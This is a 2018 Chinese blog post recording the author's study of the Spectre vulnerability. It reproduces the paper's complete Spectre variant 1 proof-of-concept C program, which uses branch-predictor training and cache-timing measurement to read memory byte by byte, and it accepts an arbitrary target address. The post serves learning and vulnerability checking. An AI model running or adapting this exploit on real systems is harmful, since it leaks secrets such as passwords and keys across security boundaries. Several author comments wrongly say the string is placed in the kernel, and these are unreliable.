关于Intel漏洞的学习

 

这几天报道了Intel的漏洞,这里学习一下并做个记录。

报告:https://spectreattack.com/spectre.pdf

  1 #include <stdio.h> 
  2 #include <stdlib.h> 
  3 #include <stdint.h> 
  4 #include <string.h>
  5 #ifdef _MSC_VER        //编译器根据版本自动调用lib库
  6 #include <intrin.h>        //用于内核编程
  7 #pragma optimize("gt", on)    //允许全局优化和指定更短的机器代码序列,on是打开功能
  8 #else
  9 #include <x86intrin.h> 
 10 #endif
 11 
 12 
 13 unsigned int array1_size = 16;
 14 uint8_t unused1[64];
 15 uint8_t array1[160] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
 16 uint8_t unused2[64];
 17 uint8_t array2[256 * 512];
 18 
 19 char * secret = "The Magic Words are QKSword";        //插入内核的字符串
 20 
 21 uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
 22 
 23 void victim_function(size_t x) 
 24 {
 25     if (x < array1_size) 
 26     {
 27         temp &= array2[array1[x] * 512];
 28     }
 29 }
 30 
 31 /********************************************************************
 32 Analysis code
 33 ********************************************************************/
 34 #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
 35 
 36                                /* Report best guess in value[0] and runner-up in value[1] */
 37 void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) 
 38 {
 39     static int results[256];
 40     int tries, i, j, k, mix_i;
 41     unsigned int junk = 0;
 42     size_t training_x, x;
 43     register uint64_t time1, time2;
 44     volatile uint8_t * addr;
 45 
 46     for (i = 0; i < 256; i++)
 47         results[i] = 0;
 48     for (tries = 999; tries > 0; tries--) 
 49     {
 50         /* Flush array2[256*(0..255)] from cache */
 51         for (i = 0; i < 256; i++)
 52             _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
 53 
 54                                             /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
 55         training_x = tries % array1_size;
 56         for (j = 29; j >= 0; j--) {
 57             _mm_clflush(&array1_size);
 58             for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
 59 
 60                                                         /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
 61                                                         /* Avoid jumps in case those tip off the branch predictor */
 62             x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
 63             x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
 64             x = training_x ^ (x & (malicious_x ^ training_x));
 65 
 66             /* Call the victim! */
 67             victim_function(x);
 68         }
 69 
 70         /* Time reads. Order is lightly mixed up to prevent stride prediction */
 71         for (i = 0; i < 256; i++) 
 72         {
 73             mix_i = ((i * 167) + 13) & 255;
 74             addr = &array2[mix_i * 512];
 75             time1 = __rdtscp(&junk); /* READ TIMER */
 76             junk = *addr; /* MEMORY ACCESS TO TIME */
 77             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
 78             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
 79                 results[mix_i]++; /* cache hit - add +1 to score for this value */
 80         }
 81 
 82         /* Locate highest & second-highest results results tallies in j/k */
 83         j = k = -1;
 84         for (i = 0; i < 256; i++) 
 85         {
 86             if (j < 0 || results[i] >= results[j]) 
 87             {
 88                 k = j;
 89                 j = i;
 90             }
 91             else if (k < 0 || results[i] >= results[k]) 
 92             {
 93                 k = i;
 94             }
 95         }
 96         if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
 97             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
 98     }
 99     results[0] ^= junk; /* use junk so code above won’t get optimized out*/
100     value[0] = (uint8_t)j;
101     score[0] = results[j];
102     value[1] = (uint8_t)k;
103     score[1] = results[k];
104 }
105 
106 int main(int argc, const char * * argv) 
107 {
108     printf("Putting '%s' in memory\n", secret);
109     size_t malicious_x = (size_t)(secret - (char *)array1); /* default for malicious_x */
110     int i, score[2], len = strlen(secret);
111     uint8_t value[2];
112 
113     for (i = 0; i < sizeof(array2); i++)
114         array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
115     if (argc == 3) 
116     {
117         sscanf_s(argv[1], "%p", (void * *)(&malicious_x));
118         malicious_x -= (size_t)array1; /* Convert input value into a pointer */
119         sscanf_s(argv[2], "%d", &len);
120     }
121 
122     printf("Reading %d bytes:\n", len);
123     while (--len >= 0) 
124     {
125         printf("Reading at malicious_x = %p... ", (void *)malicious_x);
126         readMemoryByte(malicious_x++, value, score);        //读取写入的字符串
127         printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
128         printf("0x%02X=’%c’ score=%d ", value[0],
129             (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
130         if (score[1] > 0)
131             printf("(second best: 0x%02X score=%d)", value[1], score[1]);
132         printf("\n");
133     }
134     system("pause");
135     return (0);
136 }

 

这个程序的主要功能就是把一段字符串写入内核中,然后通过漏洞读取出来,用来检测电脑是否存在漏洞。

 

代码还没全部注释完,这里先放一下,以免忘记

posted @ 2018-01-04 20:48  QKSword  阅读(658)  评论(1编辑  收藏  举报